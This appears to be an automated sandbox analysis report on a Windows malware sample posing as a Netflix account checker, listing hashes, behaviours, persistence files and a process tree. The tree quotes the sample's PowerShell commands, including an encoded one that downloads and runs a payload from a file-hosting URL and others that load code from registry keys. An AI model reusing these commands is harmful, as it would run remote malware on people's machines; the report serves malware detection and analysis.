Analysis
-
max time kernel
173s -
max time network
200s -
platform
windows10-2004_x64 -
resource
win10v2004-20220414-en -
submitted
25-05-2022 00:29
Static task
static1
Behavioral task
behavioral1
Sample
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
Resource
win7-20220414-en
General
-
Target
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe
-
Size
1.7MB
-
MD5
98bfaca19a9ae44bb60fbc3e98e54d09
-
SHA1
e2f100fc3eb808fe26cdc26327920293c1272cab
-
SHA256
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3
-
SHA512
d8b5abdb9692f54a512d53589537bb8b4aa489443ef7ae77aede69d5c1510a32ce2508eeca1ff50898fb2305151c53b9f03449dac9a75b4ea8aa370a324f4fbe
Malware Config
Extracted
https://6.top4top.net/p_13529t6r71.jpg
Signatures
-
Blocklisted process makes network request 3 IoCs
Processes:
powershell.exepowershell.exeflow pid process 17 2020 powershell.exe 21 2020 powershell.exe 60 4412 powershell.exe -
Executes dropped EXE 1 IoCs
Processes:
Checker Netflix.exepid process 4460 Checker Netflix.exe -
Checks computer location settings 2 TTPs 4 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exeWScript.exeWScript.exeWScript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation WScript.exe Key value queried \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation WScript.exe -
Drops startup file 2 IoCs
Processes:
WScript.exeWScript.exedescription ioc process File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\KBnSgEeuZWeY.lnk WScript.exe File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PoYUIXZO.lnk WScript.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Modifies registry class 1 IoCs
Processes:
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000_Classes\Local Settings a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepowershell.exepid process 3848 powershell.exe 4412 powershell.exe 2020 powershell.exe 3848 powershell.exe 2020 powershell.exe 4412 powershell.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 3848 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe Token: SeDebugPrivilege 2020 powershell.exe Token: SeDebugPrivilege 4412 powershell.exe -
Suspicious use of WriteProcessMemory 21 IoCs
Processes:
a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exeWScript.exeWScript.exeWScript.exedescription pid process target process PID 3396 wrote to memory of 4460 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 3396 wrote to memory of 4460 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 3396 wrote to memory of 4460 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe Checker Netflix.exe PID 3396 wrote to memory of 4300 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 4300 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 4300 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 3712 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 3712 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 3712 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 4060 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 4060 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3396 wrote to memory of 4060 3396 a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe WScript.exe PID 3712 wrote to memory of 2020 3712 WScript.exe powershell.exe PID 3712 wrote to memory of 2020 3712 WScript.exe powershell.exe PID 3712 wrote to memory of 2020 3712 WScript.exe powershell.exe PID 4060 wrote to memory of 3848 4060 WScript.exe powershell.exe PID 4060 wrote to memory of 3848 4060 WScript.exe powershell.exe PID 4060 wrote to memory of 3848 4060 WScript.exe powershell.exe PID 4300 wrote to memory of 4412 4300 WScript.exe powershell.exe PID 4300 wrote to memory of 4412 4300 WScript.exe powershell.exe PID 4300 wrote to memory of 4412 4300 WScript.exe powershell.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"C:\Users\Admin\AppData\Local\Temp\a0e92f4093a2238cd10451cb37932acbfe2ccdddedb7106b9faaa22fadf582e3.exe"1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:3396 -
C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"C:\Users\Admin\AppData\Roaming\Checker Netflix.exe"2⤵
- Executes dropped EXE
PID:4460
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\l1l1l.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4300 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\tsQKDrCBEkat).evTHJP).'EntryPoint'.'Invoke'($Null,$Null)3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4412
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\r1r1.vbs"2⤵
- Checks computer location settings
- Drops startup file
- Suspicious use of WriteProcessMemory
PID:4060 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit [Reflection.Assembly]::'Load'((Get-ItemProperty HKCU:\Software\vLEwUGUT).gukeLLVoun).'EntryPoint'.'Invoke'($Null,$Null)3⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3848
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\powershell.js"2⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3712 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noP -sta -w 1 -enc WwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAGIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAHMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8ANgAuAHQAbwBwADQAdABvAHAALgBuAGUAdAAvAHAAXwAxADMANQAyADkAdAA2AHIANwAxAC4AagBwAGcAJwApACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBpAG4AdgBvAGsAZQAoACQAbgB1AGwAbAAsACQAbgB1AGwAbAApAA==3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2020
-
-
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
53KB
MD5fb452a70f35730486ca3d9e8f964ce2d
SHA10dc58e718a9d28b5fe63a7baa9e8c1ff779b2f94
SHA256b1bb1798579847dd7f955bd1d43e572bb521e4f304ca6c1ab25ef24406f7e873
SHA5120be27f3b7f268323e3a5f6687906ab0c3cbfe282e017f92d93629e0c90fd07fec84d0f27afc3efef42310c5a8d1f7a0e1fe44b7ddf6ffb5a57a89b5452f88d62
-
Filesize
53KB
MD5eec69f1a7eff9b5f29366da620e7de88
SHA1be3b8ae89646aa781dfeb338ecf1b10a8c0c6060
SHA256ffc642634c4337f759852084b94b5bbbb247285d16408d4bec65f240004af5c2
SHA51270d7184fdd97388eb5eeeab2fb716e96a1a4d3a4339e83e98a9b2ca3621c19d379936a108b49d11da971cc428683835f44fc21c59ffb014e3fb5f19c07aa5061
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
1.5MB
MD5068068c3cefb4c8d997271897c3173bb
SHA1d2c22b2c05f2a5c953f9a8a728435b3ba2a9954e
SHA25623d57dd5576d4a2841457ef578455fd1c61c21758a9b325469e57d0c5f88f7b5
SHA5120b8c7c29654505f085de12c7663edc326333a439df37d7f48e61019c885ed0810ba492046eac6b2ca4a2a6c75544ad7347cb54869015980fabd85deefc0e549a
-
Filesize
129KB
MD5c78f607c916f060d6ee3bf391e303acc
SHA11575998cda060d4a570ba258abc12044601da283
SHA256f1e57d1714f74c6939ee24bb348fa12e925ec7eb380d5a7d0f1d230effb742f4
SHA512cf26b8b381402622df420fa3881630661d08d76660d01be2d695af8ade568a6f5e3b365e4b17bffee5589d936eeaad3f7ebf413f4a2d810d976b66511548875b
-
Filesize
2KB
MD540b65baa1541784dd92f5aa8ae11b0ef
SHA10772c95f56a025704c01389f2d1108a17fb987cf
SHA2569609d3a8ee7d439c54aca9c5aeced07caa4199f116367ecb88b63e9e2e29a699
SHA512fc784babe03c75559314dc15a04386d528e71b003b40349df2a4845576bbc9d2f0898d27fc5b1be8cda9fbf16715822bf0616fa7835e1abefe7ccacc8da3b3d2
-
Filesize
87KB
MD50494f414da149631c3d59861865dad37
SHA1c9fd335759efb52e58acb974af27cdecb35d0f10
SHA256a2effa9551b467c88ccea70024bd13650267752d1d6bcd91a5bd6915d9c47a56
SHA512a86f2532f2ba996dc8421146d918250b1925daf803a470e3bce312f29a4d0b25af51d4abc005ab390650cb0cf6b4024df3c411e6ae4ed03cd51906b54683f333